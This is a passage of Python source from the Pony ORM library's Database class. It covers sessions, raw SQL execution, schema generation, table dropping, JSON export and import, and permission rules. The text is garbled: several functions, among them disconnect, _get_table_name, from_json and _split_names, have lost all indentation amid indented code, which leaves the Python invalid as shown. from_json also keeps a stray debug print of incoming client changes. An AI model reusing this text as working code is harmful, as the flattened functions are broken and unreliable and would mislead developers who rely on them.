        # Per-thread dict mapping SQL text to its QueryStat.
        return database._dblocal.stats
    def _update_local_stat(database, sql, query_start_time):
        # Record the execution of `sql` (started at `query_start_time`)
        # in the per-thread statistics.
        dblocal = database._dblocal
        dblocal.last_sql = sql
        stats = dblocal.stats
        stat = stats.get(sql)
        if stat is not None: stat.query_executed(query_start_time)
        else: stats[sql] = QueryStat(sql, query_start_time)
    def merge_local_stats(database):
        # Fold the current thread's statistics into the global (cross-thread)
        # statistics under the lock, then reset the thread-local ones.
        setdefault = database._global_stats.setdefault
        with database._global_stats_lock:
            for sql, stat in iteritems(database._dblocal.stats):
                global_stat = setdefault(sql, stat)
                if global_stat is not stat: global_stat.merge(stat)
        database._dblocal.stats.clear()
    @property
    def global_stats(database):
        # Snapshot of cross-thread statistics (returns copies, so callers
        # do not need any locking).
        with database._global_stats_lock:
            return {sql: stat.copy() for sql, stat in iteritems(database._global_stats)}
    @property
    def global_stats_lock(database):
        # Deprecated: global_stats already takes the lock internally.
        deprecated(3, "global_stats_lock is deprecated, just use global_stats property without any locking")
        return database._global_stats_lock
    @cut_traceback
    def get_connection(database):
        # Return the raw DBAPI connection of the current session, starting
        # a transaction if one is not already active.
        cache = database._get_cache()
        if not cache.in_transaction:
            cache.immediate = True
            cache.prepare_connection_for_query_execution()
            cache.in_transaction = True
        connection = cache.connection
        assert connection is not None
        return connection
@cut_traceback
def disconnect(database):
provider = database.provider
if provider is None: return
if local.db_context_counter: throw(TransactionError, 'disconnect() cannot be called inside of db_sesison')
cache = local.db2cache.get(database)
if cache is not None: cache.rollback()
provider.disconnect()
    def _get_cache(database):
        # Return the SessionCache for the current thread, creating it on
        # demand. Outside of db_session this is permitted only in
        # interactive mode on the main thread.
        if database.provider is None: throw(MappingError, 'Database object is not bound with a provider yet')
        cache = local.db2cache.get(database)
        if cache is not None: return cache
        if not local.db_context_counter and not (
                pony.MODE == 'INTERACTIVE' and current_thread().__class__ is _MainThread
        ): throw(TransactionError, 'db_session is required when working with the database')
        cache = local.db2cache[database] = SessionCache(database)
        return cache
    @cut_traceback
    def flush(database):
        # Push all pending object changes of the current session to the
        # database without committing the transaction.
        database._get_cache().flush()
    @cut_traceback
    def commit(database):
        # Flush and commit the current thread's session for this database,
        # if one exists.
        cache = local.db2cache.get(database)
        if cache is not None:
            cache.flush_and_commit()
    @cut_traceback
    def rollback(database):
        # Roll back the current thread's session for this database, if any;
        # failures are wrapped into RollbackException.
        cache = local.db2cache.get(database)
        if cache is not None:
            try: cache.rollback()
            except: transact_reraise(RollbackException, [sys.exc_info()])
    @cut_traceback
    def execute(database, sql, globals=None, locals=None):
        # Execute raw SQL; $-placeholders are evaluated in the caller's
        # scope. Starts a transaction and returns the DBAPI cursor.
        return database._exec_raw_sql(sql, globals, locals, frame_depth=cut_traceback_depth+1, start_transaction=True)
    def _exec_raw_sql(database, sql, globals, locals, frame_depth, start_transaction=False):
        # Shared implementation of execute()/select()/get()/exists():
        # adapt $-placeholders to the driver's paramstyle, evaluate the
        # embedded expressions in the caller's frame, and run the query.
        provider = database.provider
        if provider is None: throw(MappingError, 'Database object is not bound with a provider yet')
        sql = sql[:] # sql = templating.plainstr(sql)
        if globals is None:
            assert locals is None
            # Capture the caller's namespaces to evaluate $-expressions in.
            frame_depth += 1
            globals = sys._getframe(frame_depth).f_globals
            locals = sys._getframe(frame_depth).f_locals
        adapted_sql, code = adapt_sql(sql, provider.paramstyle)
        arguments = eval(code, globals, locals)
        return database._exec_sql(adapted_sql, arguments, False, start_transaction)
    @cut_traceback
    def select(database, sql, globals=None, locals=None, frame_depth=0):
        # Execute a SELECT (the 'select' keyword may be omitted) and return
        # the result rows as a list.
        if not select_re.match(sql): sql = 'select ' + sql
        cursor = database._exec_raw_sql(sql, globals, locals, frame_depth+cut_traceback_depth+1)
        max_fetch_count = options.MAX_FETCH_COUNT
        if max_fetch_count is not None:
            # Guard against accidentally huge result sets.
            result = cursor.fetchmany(max_fetch_count)
            if cursor.fetchone() is not None: throw(TooManyRowsFound)
        else: result = cursor.fetchall()
        # Single-column queries return plain values instead of row objects.
        if len(cursor.description) == 1: return [ row[0] for row in result ]
        # Build a lightweight named-tuple-like row class with one attribute
        # per column (skipping names that are not valid identifiers or
        # would shadow tuple dunder attributes).
        row_class = type("row", (tuple,), {})
        for i, column_info in enumerate(cursor.description):
            column_name = column_info[0]
            if not is_ident(column_name): continue
            if hasattr(tuple, column_name) and column_name.startswith('__'): continue
            setattr(row_class, column_name, property(itemgetter(i)))
        return [ row_class(row) for row in result ]
    @cut_traceback
    def get(database, sql, globals=None, locals=None):
        # Execute a SELECT and return exactly one row; raises RowNotFound
        # when empty and MultipleRowsFound when more than one row matches.
        rows = database.select(sql, globals, locals, frame_depth=cut_traceback_depth+1)
        if not rows: throw(RowNotFound)
        if len(rows) > 1: throw(MultipleRowsFound)
        row = rows[0]
        return row
    @cut_traceback
    def exists(database, sql, globals=None, locals=None):
        # True if the given SELECT returns at least one row.
        if not select_re.match(sql): sql = 'select ' + sql
        cursor = database._exec_raw_sql(sql, globals, locals, frame_depth=cut_traceback_depth+1)
        result = cursor.fetchone()
        return bool(result)
    @cut_traceback
    def insert(database, table_name, returning=None, **kwargs):
        # Insert one row (column=value keyword arguments) into `table_name`.
        # When `returning` names a column, its freshly generated value is
        # returned; otherwise the cursor's lastrowid (when available).
        table_name = database._get_table_name(table_name)
        if database.provider is None: throw(MappingError, 'Database object is not bound with a provider yet')
        query_key = (table_name,) + tuple(kwargs) # keys are not sorted deliberately!!
        if returning is not None: query_key = query_key + (returning,)
        # Generated SQL is cached per (table, column order, returning).
        cached_sql = database._insert_cache.get(query_key)
        if cached_sql is None:
            ast = [ 'INSERT', table_name, kwargs.keys(),
                    [ [ 'PARAM', (i, None, None) ] for i in xrange(len(kwargs)) ], returning ]
            sql, adapter = database._ast2sql(ast)
            cached_sql = sql, adapter
            database._insert_cache[query_key] = cached_sql
        else: sql, adapter = cached_sql
        arguments = adapter(values_list(kwargs)) # order of values same as order of keys
        if returning is not None:
            return database._exec_sql(sql, arguments, returning_id=True, start_transaction=True)
        cursor = database._exec_sql(sql, arguments, start_transaction=True)
        return getattr(cursor, 'lastrowid', None)
    def _ast2sql(database, sql_ast):
        # Translate a Pony abstract SQL tree into provider-specific SQL text
        # plus an adapter that turns Python values into query arguments.
        sql, adapter = database.provider.ast2sql(sql_ast)
        return sql, adapter
    def _exec_sql(database, sql, arguments=None, returning_id=False, start_transaction=False):
        # Low-level query execution: obtain a connection for the current
        # session, execute the SQL (retrying once after a reconnect on
        # failure), and update per-thread statistics.
        cache = database._get_cache()
        if start_transaction: cache.immediate = True
        connection = cache.prepare_connection_for_query_execution()
        cursor = connection.cursor()
        if local.debug: log_sql(sql, arguments)
        provider = database.provider
        t = time()
        try: new_id = provider.execute(cursor, sql, arguments, returning_id)
        except Exception as e:
            # The provider may decide the connection is dead and hand us a
            # fresh one; in that case the query is retried exactly once.
            connection = cache.reconnect(e)
            cursor = connection.cursor()
            if local.debug: log_sql(sql, arguments)
            t = time()
            new_id = provider.execute(cursor, sql, arguments, returning_id)
        if cache.immediate: cache.in_transaction = True
        database._update_local_stat(sql, t)
        if not returning_id: return cursor
        # Normalize Python 2 long ids to int for consistency.
        if PY2 and type(new_id) is long: new_id = int(new_id)
        return new_id
    @cut_traceback
    def generate_mapping(database, filename=None, check_tables=True, create_tables=False):
        # Build the database schema from the declared entities: resolve
        # attribute types, link reverse attributes, assign tables and columns,
        # then create indexes and foreign keys.  Optionally creates and/or
        # checks the actual tables in the database afterwards.
        provider = database.provider
        if provider is None: throw(MappingError, 'Database object is not bound with a provider yet')
        if database.schema: throw(BindingError, 'Mapping was already generated')
        if filename is not None: throw(NotImplementedError)
        schema = database.schema = provider.dbschema_cls(provider)
        entities = list(sorted(database.entities.values(), key=attrgetter('_id_')))
        for entity in entities:
            entity._resolve_attr_types_()
        for entity in entities:
            entity._link_reverse_attrs_()
        for entity in entities:
            entity._check_table_options_()
        def get_columns(table, column_names):
            # Map column names to the table's Column objects.
            column_dict = table.column_dict
            return tuple(column_dict[name] for name in column_names)
        # First pass: assign a table to each entity and create its columns.
        for entity in entities:
            entity._get_pk_columns_()
            table_name = entity._table_
            is_subclass = entity._root_ is not entity
            if is_subclass:
                # Single-table inheritance: subclasses share the root's table.
                if table_name is not None: throw(NotImplementedError)
                table_name = entity._root_._table_
                entity._table_ = table_name
            elif table_name is None:
                table_name = provider.get_default_entity_table_name(entity)
                entity._table_ = table_name
            else: assert isinstance(table_name, (basestring, tuple))
            table = schema.tables.get(table_name)
            if table is None: table = schema.add_table(table_name, entity)
            else: table.add_entity(entity)
            for attr in entity._new_attrs_:
                if attr.is_collection:
                    if not isinstance(attr, Set): throw(NotImplementedError)
                    reverse = attr.reverse
                    if not reverse.is_collection: # many-to-one:
                        if attr.table is not None: throw(MappingError,
                            "Parameter 'table' is not allowed for many-to-one attribute %s" % attr)
                        elif attr.columns: throw(NotImplementedError,
                            "Parameter 'column' is not allowed for many-to-one attribute %s" % attr)
                        continue
                    # many-to-many: only one side of the pair creates the
                    # intermediate table; ties are broken by entity/attr names.
                    if not isinstance(reverse, Set): throw(NotImplementedError)
                    if attr.entity.__name__ > reverse.entity.__name__: continue
                    if attr.entity is reverse.entity and attr.name > reverse.name: continue
                    if attr.table:
                        if not reverse.table: reverse.table = attr.table
                        elif reverse.table != attr.table:
                            throw(MappingError, "Parameter 'table' for %s and %s do not match" % (attr, reverse))
                        table_name = attr.table
                    elif reverse.table: table_name = attr.table = reverse.table
                    else:
                        table_name = provider.get_default_m2m_table_name(attr, reverse)
                    m2m_table = schema.tables.get(table_name)
                    if m2m_table is not None:
                        if not attr.table:
                            # Auto-generated name collided: append _2, _3, ...
                            # until an unused table name is found.
                            seq_counter = itertools.count(2)
                            while m2m_table is not None:
                                if isinstance(table_name, basestring):
                                    new_table_name = table_name + '_%d' % next(seq_counter)
                                else:
                                    schema_name, base_name = provider.split_table_name(table_name)
                                    new_table_name = schema_name, base_name + '_%d' % next(seq_counter)
                                m2m_table = schema.tables.get(new_table_name)
                            table_name = new_table_name
                        elif m2m_table.entities or m2m_table.m2m: throw(MappingError,
                            "Table name %s is already in use" % provider.format_table_name(table_name))
                        else: throw(NotImplementedError)
                    attr.table = reverse.table = table_name
                    m2m_table = schema.add_table(table_name)
                    m2m_columns_1 = attr.get_m2m_columns(is_reverse=False)
                    m2m_columns_2 = reverse.get_m2m_columns(is_reverse=True)
                    if m2m_columns_1 == m2m_columns_2: throw(MappingError,
                        'Different column names should be specified for attributes %s and %s' % (attr, reverse))
                    assert len(m2m_columns_1) == len(reverse.converters)
                    assert len(m2m_columns_2) == len(attr.converters)
                    for column_name, converter in izip(m2m_columns_1 + m2m_columns_2, reverse.converters + attr.converters):
                        m2m_table.add_column(column_name, converter.get_sql_type(), converter, True)
                    m2m_table.add_index(None, tuple(m2m_table.column_list), is_pk=True)
                    m2m_table.m2m.add(attr)
                    m2m_table.m2m.add(reverse)
                else:
                    # Regular (non-collection) attribute: settle nullability,
                    # then create the column(s).
                    if attr.is_required: pass
                    elif not attr.is_string:
                        if attr.nullable is False:
                            throw(TypeError, 'Optional attribute with non-string type %s must be nullable' % attr)
                        attr.nullable = True
                    elif entity._database_.provider.dialect == 'Oracle':
                        # Oracle stores '' as NULL, so optional strings must be nullable.
                        if attr.nullable is False: throw(ERDiagramError,
                            'In Oracle, optional string attribute %s must be nullable' % attr)
                        attr.nullable = True
                    columns = attr.get_columns() # initializes attr.converters
                    if not attr.reverse and attr.default is not None:
                        assert len(attr.converters) == 1
                        if not callable(attr.default): attr.default = attr.validate(attr.default)
                    assert len(columns) == len(attr.converters)
                    if len(columns) == 1:
                        converter = attr.converters[0]
                        table.add_column(columns[0], converter.get_sql_type(attr),
                                         converter, not attr.nullable, attr.sql_default)
                    elif columns:
                        # Composite attribute (e.g. composite foreign key).
                        if attr.sql_type is not None: throw(NotImplementedError,
                            'sql_type cannot be specified for composite attribute %s' % attr)
                        for (column_name, converter) in izip(columns, attr.converters):
                            table.add_column(column_name, converter.get_sql_type(), converter, not attr.nullable)
                    else: pass # virtual attribute of one-to-one pair
            entity._attrs_with_columns_ = [ attr for attr in entity._attrs_
                                            if not attr.is_collection and attr.columns ]
            if not table.pk_index:
                if len(entity._pk_columns_) == 1 and entity._pk_attrs_[0].auto: is_pk = "auto"
                else: is_pk = True
                table.add_index(None, get_columns(table, entity._pk_columns_), is_pk)
            for index in entity._indexes_:
                if index.is_pk: continue
                column_names = []
                attrs = index.attrs
                for attr in attrs: column_names.extend(attr.columns)
                index_name = attrs[0].index if len(attrs) == 1 else None
                table.add_index(index_name, get_columns(table, column_names), is_unique=index.is_unique)
            # Cache per-entity column/converter lists used by CRUD operations.
            columns = []
            columns_without_pk = []
            converters = []
            converters_without_pk = []
            for attr in entity._attrs_with_columns_:
                columns.extend(attr.columns) # todo: inheritance
                converters.extend(attr.converters)
                if not attr.is_pk:
                    columns_without_pk.extend(attr.columns)
                    converters_without_pk.extend(attr.converters)
            entity._columns_ = columns
            entity._columns_without_pk_ = columns_without_pk
            entity._converters_ = converters
            entity._converters_without_pk_ = converters_without_pk
        # Second pass: create foreign keys and remaining secondary indexes.
        for entity in entities:
            table = schema.tables[entity._table_]
            for attr in entity._new_attrs_:
                if attr.is_collection:
                    reverse = attr.reverse
                    if not reverse.is_collection: continue
                    if not isinstance(attr, Set): throw(NotImplementedError)
                    if not isinstance(reverse, Set): throw(NotImplementedError)
                    m2m_table = schema.tables[attr.table]
                    parent_columns = get_columns(table, entity._pk_columns_)
                    child_columns = get_columns(m2m_table, reverse.columns)
                    m2m_table.add_foreign_key(reverse.fk_name, child_columns, table, parent_columns, attr.index)
                    if attr.symmetric:
                        child_columns = get_columns(m2m_table, attr.reverse_columns)
                        m2m_table.add_foreign_key(attr.reverse_fk_name, child_columns, table, parent_columns)
                elif attr.reverse and attr.columns:
                    rentity = attr.reverse.entity
                    parent_table = schema.tables[rentity._table_]
                    parent_columns = get_columns(parent_table, rentity._pk_columns_)
                    child_columns = get_columns(table, attr.columns)
                    table.add_foreign_key(attr.reverse.fk_name, child_columns, parent_table, parent_columns, attr.index)
                elif attr.index and attr.columns:
                    columns = tuple(imap(table.column_dict.__getitem__, attr.columns))
                    table.add_index(attr.index, columns, is_unique=attr.is_unique)
            entity._initialize_bits_()
        if create_tables: database.create_tables(check_tables)
        elif check_tables: database.check_tables()
    @cut_traceback
    @db_session(ddl=True)
    def drop_table(database, table_name, if_exists=False, with_all_data=False):
        # Drop one table, referenced by entity class, Set attribute or name.
        # Refuses to drop a non-empty table unless with_all_data is true.
        database._drop_tables([ table_name ], if_exists, with_all_data, try_normalized=True)
def _get_table_name(database, table_name):
if isinstance(table_name, EntityMeta):
entity = table_name
table_name = entity._table_
elif isinstance(table_name, Set):
attr = table_name
table_name = attr.table if attr.reverse.is_collection else attr.entity._table_
elif isinstance(table_name, Attribute): throw(TypeError,
"Attribute %s is not Set and doesn't have corresponding table" % table_name)
elif table_name is None:
if database.schema is None: throw(MappingError, 'No mapping was generated for the database')
else: throw(TypeError, 'Table name cannot be None')
elif isinstance(table_name, tuple):
for component in table_name:
if not isinstance(component, basestring):
throw(TypeError, 'Invalid table name component: {}'.format(component))
elif isinstance(table_name, basestring):
table_name = table_name[:] # table_name = templating.plainstr(table_name)
else: throw(TypeError, 'Invalid table name: {}'.format(table_name))
return table_name
    @cut_traceback
    @db_session(ddl=True)
    def drop_all_tables(database, with_all_data=False):
        # Drop every table of the generated schema (if_exists semantics).
        if database.schema is None: throw(ERDiagramError, 'No mapping was generated for the database')
        database._drop_tables(database.schema.tables, True, with_all_data)
    def _drop_tables(database, table_names, if_exists, with_all_data, try_normalized=False):
        # Shared implementation of drop_table()/drop_all_tables().  Validates
        # existence (and, unless with_all_data, emptiness) of every table
        # before dropping any of them.
        cache = database._get_cache()
        connection = cache.prepare_connection_for_query_execution()
        provider = database.provider
        existed_tables = []
        for table_name in table_names:
            table_name = database._get_table_name(table_name)
            if provider.table_exists(connection, table_name): existed_tables.append(table_name)
            elif not if_exists:
                if try_normalized:
                    # Suggest a case/quoting-normalized candidate in the error.
                    if isinstance(table_name, basestring):
                        normalized_table_name = provider.normalize_name(table_name)
                    else:
                        schema_name, base_name = provider.split_table_name(table_name)
                        normalized_table_name = schema_name, provider.normalize_name(base_name)
                    if normalized_table_name != table_name and provider.table_exists(connection, normalized_table_name):
                        throw(TableDoesNotExist, 'Table %s does not exist (probably you meant table %s)' % (
                            provider.format_table_name(table_name),
                            provider.format_table_name(normalized_table_name)))
                throw(TableDoesNotExist, 'Table %s does not exist' % provider.format_table_name(table_name))
        if not with_all_data:
            for table_name in existed_tables:
                if provider.table_has_data(connection, table_name): throw(TableIsNotEmpty,
                    'Cannot drop table %s because it is not empty. Specify option '
                    'with_all_data=True if you want to drop table with all data'
                    % provider.format_table_name(table_name))
        for table_name in existed_tables:
            if local.debug: log_orm('DROPPING TABLE %s' % provider.format_table_name(table_name))
            provider.drop_table(connection, table_name)
    @cut_traceback
    @db_session(ddl=True)
    def create_tables(database, check_tables=False):
        # Create all missing tables of the generated schema; optionally verify
        # existing tables against the schema afterwards.
        cache = database._get_cache()
        if database.schema is None: throw(MappingError, 'No mapping was generated for the database')
        connection = cache.prepare_connection_for_query_execution()
        database.schema.create_tables(database.provider, connection)
        if check_tables: database.schema.check_tables(database.provider, connection)
    @cut_traceback
    @db_session()
    def check_tables(database):
        # Verify that the existing database tables match the generated schema.
        cache = database._get_cache()
        if database.schema is None: throw(MappingError, 'No mapping was generated for the database')
        connection = cache.prepare_connection_for_query_execution()
        database.schema.check_tables(database.provider, connection)
    @contextmanager
    def set_perms_for(database, *entities):
        # Context manager establishing the (database, entities) context used
        # by perm().  Subclasses of each given entity are included; calls
        # cannot be nested.
        if not entities: throw(TypeError, 'You should specify at least one positional argument')
        entity_set = set(entities)
        for entity in entities:
            if not isinstance(entity, EntityMeta):
                throw(TypeError, 'Entity class expected. Got: %s' % entity)
            entity_set.update(entity._subclasses_)
        if local.perms_context is not None:
            throw(OrmError, "'set_perms_for' context manager calls cannot be nested")
        local.perms_context = database, entity_set
        try: yield
        finally:
            assert local.perms_context and local.perms_context[0] is database
            local.perms_context = None
    def _get_schema_dict(database):
        # Build a JSON-ready description of the entity diagram, filtered down
        # to what the current user is permitted to view.
        result = []
        user = get_current_user()
        for entity in sorted(database.entities.values(), key=attrgetter('_id_')):
            if not can_view(user, entity): continue
            attrs = []
            for attr in entity._new_attrs_:
                if not can_view(user, attr): continue
                d = dict(name=attr.name, type=attr.py_type.__name__, kind=attr.__class__.__name__)
                if attr.auto: d['auto'] = True
                if attr.reverse:
                    # Hide the relation entirely if its other side is hidden.
                    if not can_view(user, attr.reverse.entity): continue
                    if not can_view(user, attr.reverse): continue
                    d['reverse'] = attr.reverse.name
                if attr.lazy: d['lazy'] = True
                if attr.nullable: d['nullable'] = True
                # Only simple (numeric/string) defaults are serializable.
                if attr.default and issubclass(type(attr.default), (int_types, basestring)):
                    d['defaultValue'] = attr.default
                attrs.append(d)
            d = dict(name=entity.__name__, newAttrs=attrs, pkAttrs=[ attr.name for attr in entity._pk_attrs_ ])
            if entity._all_bases_:
                d['bases'] = [ base.__name__ for base in entity._all_bases_ ]
            if entity._simple_keys_:
                d['simpleKeys'] = [ attr.name for attr in entity._simple_keys_ ]
            if entity._composite_keys_:
                d['compositeKeys'] = [ [ attr.name for attr in attrs ] for attrs in entity._composite_keys_ ]
            result.append(d)
        return result
def _get_schema_json(database):
schema_json = json.dumps(database._get_schema_dict(), default=basic_converter, sort_keys=True)
schema_hash = md5(schema_json.encode('utf-8')).hexdigest()
return schema_json, schema_hash
    @cut_traceback
    def to_json(database, data, include=(), exclude=(), converter=None, with_schema=True, schema_hash=None):
        # Serialize `data` (which may contain entity instances) to a JSON
        # document of the form {"data": ..., "objects": ..., "schema": ...}.
        # Entities inside `data` become {class, pk} references; their attribute
        # values are collected into the "objects" section, subject to the
        # current user's view permissions.
        for attrs, param_name in ((include, 'include'), (exclude, 'exclude')):
            for attr in attrs:
                if not isinstance(attr, Attribute): throw(TypeError,
                    "Each item of '%s' list should be attribute. Got: %s" % (param_name, attr))
        include, exclude = set(include), set(exclude)
        if converter is None: converter = basic_converter
        user = get_current_user()
        def user_has_no_rights_to_see(obj, attr=None):
            user_groups = get_user_groups(user)
            throw(PermissionError, 'The current user %s which belongs to groups %s '
                                   'has no rights to see the object %s on the frontend'
                                   % (user, sorted(user_groups), obj))
        object_set = set()
        caches = set()
        def obj_converter(obj):
            # json.dumps fallback: entities become {class, pk} references and
            # are remembered in object_set for the second serialization phase.
            if not isinstance(obj, Entity): return converter(obj)
            cache = obj._session_cache_
            if cache is not None: caches.add(cache)
            if len(caches) > 1: throw(TransactionError,
                'An attempt to serialize objects belonging to different transactions')
            if not can_view(user, obj):
                user_has_no_rights_to_see(obj)
            object_set.add(obj)
            pkval = obj._get_raw_pkval_()
            if len(pkval) == 1: pkval = pkval[0]
            return { 'class': obj.__class__.__name__, 'pk': pkval }
        data_json = json.dumps(data, default=obj_converter)
        objects = {}
        if caches:
            cache = caches.pop()
            if cache.database is not database:
                throw(TransactionError, 'An object does not belong to specified database')
            # object_list grows during iteration: included relations and
            # collection items are appended as they are discovered.
            object_list = list(object_set)
            objects = {}
            for obj in object_list:
                if obj in cache.seeds[obj._pk_attrs_]: obj._load_()
                entity = obj.__class__
                if not can_view(user, obj):
                    user_has_no_rights_to_see(obj)
                # objects is nested: entity name -> pk component(s) -> attrs.
                d = objects.setdefault(entity.__name__, {})
                for val in obj._get_raw_pkval_(): d = d.setdefault(val, {})
                assert not d, d
                for attr in obj._attrs_:
                    if attr in exclude: continue
                    if attr in include: pass
                        # if attr not in entity_perms.can_read: user_has_no_rights_to_see(obj, attr)
                    elif attr.is_collection: continue
                    elif attr.lazy: continue
                    # elif attr not in entity_perms.can_read: continue
                    if attr.is_collection:
                        # Included collection: serialize items' pks and queue
                        # unseen items for serialization too.
                        if not isinstance(attr, Set): throw(NotImplementedError)
                        value = []
                        for item in attr.__get__(obj):
                            if item not in object_set:
                                object_set.add(item)
                                object_list.append(item)
                            pkval = item._get_raw_pkval_()
                            value.append(pkval[0] if len(pkval) == 1 else pkval)
                        value.sort()
                    else:
                        value = attr.__get__(obj)
                        if value is not None and attr.is_relation:
                            if attr in include and value not in object_set:
                                object_set.add(value)
                                object_list.append(value)
                            pkval = value._get_raw_pkval_()
                            value = pkval[0] if len(pkval) == 1 else pkval
                    d[attr.name] = value
        objects_json = json.dumps(objects, default=converter)
        if not with_schema:
            return '{"data": %s, "objects": %s}' % (data_json, objects_json)
        schema_json, new_schema_hash = database._get_schema_json()
        if schema_hash is not None and schema_hash == new_schema_hash:
            # The client already has an up-to-date schema: omit it.
            return '{"data": %s, "objects": %s, "schema_hash": "%s"}' \
                   % (data_json, objects_json, new_schema_hash)
        return '{"data": %s, "objects": %s, "schema": %s, "schema_hash": "%s"}' \
               % (data_json, objects_json, schema_json, new_schema_hash)
@cut_traceback
@db_session
def from_json(database, changes, observer=None):
changes = json.loads(changes)
import pprint; pprint.pprint(changes)
objmap = {}
for diff in changes['objects']:
if diff['_status_'] == 'c': continue
pk = diff['_pk_']
pk = (pk,) if type(pk) is not list else tuple(pk)
entity_name = diff['class']
entity = database.entities[entity_name]
obj = entity._get_by_raw_pkval_(pk, from_db=False)
oid = diff['_id_']
objmap[oid] = obj
def id2obj(attr, val):
return objmap[val] if attr.reverse and val is not None else val
user = get_current_user()
def user_has_no_rights_to(operation, x):
user_groups = get_user_groups(user)
s = 'attribute %s' % x if isinstance(x, Attribute) else 'object %s' % x
throw(PermissionError, 'The current user %s which belongs to groups %s '
'has no rights to %s the %s on the frontend'
% (user, sorted(user_groups), operation, s))
for diff in changes['objects']:
entity_name = diff['class']
entity = database.entities[entity_name]
oldvals = {}
newvals = {}
oldadict = {}
newadict = {}
for name, val in diff.items():
if name not in ('class', '_pk_', '_id_', '_status_'):
attr = entity._adict_[name]
if not attr.is_collection:
if type(val) is dict:
if 'old' in val: oldvals[attr.name] = oldadict[attr] = attr.validate(id2obj(attr, val['old']))
if 'new' in val: newvals[attr.name] = newadict[attr] = attr.validate(id2obj(attr, val['new']))
else: newvals[attr.name] = newadict[attr] = attr.validate(id2obj(attr, val))
oid = diff['_id_']
status = diff['_status_']
if status == 'c':
assert not oldvals
for attr in newadict:
if not can_create(user, attr): user_has_no_rights_to('initialize', attr)
obj = entity(**newvals)
if observer:
flush() # in order to get obj.id
observer('create', obj, newvals)
objmap[oid] = obj
if not can_edit(user, obj): user_has_no_rights_to('create', obj)
else:
obj = objmap[oid]
if status == 'd':
if not can_delete(user, obj): user_has_no_rights_to('delete', obj)
if observer: observer('delete', obj)
obj.delete()
elif status == 'u':
if not can_edit(user, obj): user_has_no_rights_to('update', obj)
if newvals:
for attr in newadict:
if not can_edit(user, attr): user_has_no_rights_to('edit', attr)
assert oldvals
if observer:
observer('update', obj, newvals, oldvals)
obj._db_set_(oldadict) # oldadict can be modified here
for attr in oldadict: attr.__get__(obj)
obj.set(**newvals)
else: assert not oldvals
objmap[oid] = obj
flush()
for diff in changes['objects']:
if diff['_status_'] == 'd': continue
obj = objmap[diff['_id_']]
entity = obj.__class__
for name, val in diff.items():
if name not in ('class', '_pk_', '_id_', '_status_'):
attr = entity._adict_[name]
if attr.is_collection and attr.reverse.is_collection and attr < attr.reverse:
removed = [ objmap[oid] for oid in val.get('removed', ()) ]
added = [ objmap[oid] for oid in val.get('added', ()) ]
if (added or removed) and not can_edit(user, attr): user_has_no_rights_to('edit', attr)
collection = attr.__get__(obj)
if removed:
observer('remove', obj, {name: removed})
collection.remove(removed)
if added:
observer('add', obj, {name: added})
collection.add(added)
flush()
def deserialize(x):
t = type(x)
if t is list: return list(imap(deserialize, x))
if t is dict:
if '_id_' not in x:
return {key: deserialize(val) for key, val in iteritems(x)}
obj = objmap.get(x['_id_'])
if obj is None:
entity_name = x['class']
entity = database.entities[entity_name]
pk = x['_pk_']
obj = entity[pk]
return obj
return x
return deserialize(changes['data'])
def basic_converter(x):
    # Default json.dumps fallback: dates and Decimals become strings, mappings
    # become plain dicts, entities become their primary key value, any other
    # iterable becomes a list; everything else is a serialization error.
    if isinstance(x, (datetime.datetime, datetime.date, Decimal)):
        return str(x)
    if isinstance(x, dict):
        return dict(x)
    if isinstance(x, Entity):
        raw_pk = x._get_raw_pkval_()
        return raw_pk[0] if len(raw_pk) == 1 else raw_pk
    if hasattr(x, '__iter__'):
        return list(x)
    throw(TypeError, 'The following object cannot be converted to JSON: %r' % x)
@cut_traceback
def perm(*args, **kwargs):
    # Create an AccessRule granting the given permissions (positional names)
    # to groups/roles/labels (keyword names).  Must be called inside the
    # set_perms_for() context manager, which supplies database and entities.
    context = local.perms_context
    if context is None:
        throw(OrmError, "'perm' function can be called within 'set_perm_for' context manager only")
    database, entities = context
    permissions = _split_names('Permission', args)
    groups = pop_names_from_kwargs('Group', kwargs, 'group', 'groups')
    roles = pop_names_from_kwargs('Role', kwargs, 'role', 'roles')
    labels = pop_names_from_kwargs('Label', kwargs, 'label', 'labels')
    if kwargs:
        throw(TypeError, 'Unknown keyword argument name: %s' % next(iter(kwargs)))
    return AccessRule(database, entities, permissions, groups, roles, labels)
def _split_names(typename, names):
if names is None: return set()
if isinstance(names, basestring):
names = names.replace(',', ' ').split()
else:
try: namelist = list(names)
except: throw(TypeError, '%s name should be string. Got: %s' % (typename, names))
names = []
for name in namelist:
names.extend(_split_names(typename, name))
for name in names:
if not is_ident(name): throw(TypeError, '%s name should be identifier. Got: %s' % (typename, name))
return set(names)
def pop_names_from_kwargs(typename, kwargs, *kwnames):
    # Pop each of `kwnames` out of `kwargs` (singular and plural aliases) and
    # merge the parsed names into one set.
    collected = set()
    for key in kwnames:
        value = kwargs.pop(key, None)
        if value is not None:
            collected.update(_split_names(typename, value))
    return collected
class AccessRule(object):
    # Grants a set of permissions on a set of entities to users matching the
    # given groups/roles/labels; 'anybody' is always added to the groups.
    def __init__(rule, database, entities, permissions, groups, roles, labels):
        rule.database = database
        rule.entities = entities
        if not permissions: throw(TypeError, 'At least one permission should be specified')
        rule.permissions = permissions
        rule.groups = groups
        rule.groups.add('anybody')
        rule.roles = roles
        rule.labels = labels
        rule.entities_to_exclude = set()
        rule.attrs_to_exclude = set()
        # Register the rule with every covered entity, once per permission.
        for entity in entities:
            for permission in rule.permissions:
                entity._access_rules_[permission].add(rule)
    def exclude(rule, *args):
        # Carve specific entities (plus their subclasses) or non-pk attributes
        # out of the rule's coverage.
        for arg in args:
            if isinstance(arg, EntityMeta):
                rule.entities_to_exclude.add(arg)
                rule.entities_to_exclude.update(arg._subclasses_)
            elif isinstance(arg, Attribute):
                if arg.pk_offset is not None:
                    throw(TypeError, 'Primary key attribute %s cannot be excluded' % arg)
                rule.attrs_to_exclude.add(arg)
            else: throw(TypeError, 'Entity or attribute expected. Got: %r' % arg)
@cut_traceback
def has_perm(user, perm, x):
    # Check whether `user` holds permission `perm` for `x`, which may be an
    # entity class, an entity instance or an attribute.  Results are memoized
    # per session in cache.perm_cache[user][perm], keyed by `x`.
    if isinstance(x, EntityMeta):
        entity = x
    elif isinstance(x, Entity):
        entity = x.__class__
    elif isinstance(x, Attribute):
        if x.hidden: return False
        entity = x.entity
    else: throw(TypeError, "The third parameter of 'has_perm' function should be entity class, entity instance "
                           "or attribute. Got: %r" % x)
    access_rules = entity._access_rules_.get(perm)
    if not access_rules: return False
    cache = entity._database_._get_cache()
    perm_cache = cache.perm_cache[user][perm]
    result = perm_cache.get(x)
    if result is not None: return result
    user_groups = get_user_groups(user)
    result = False
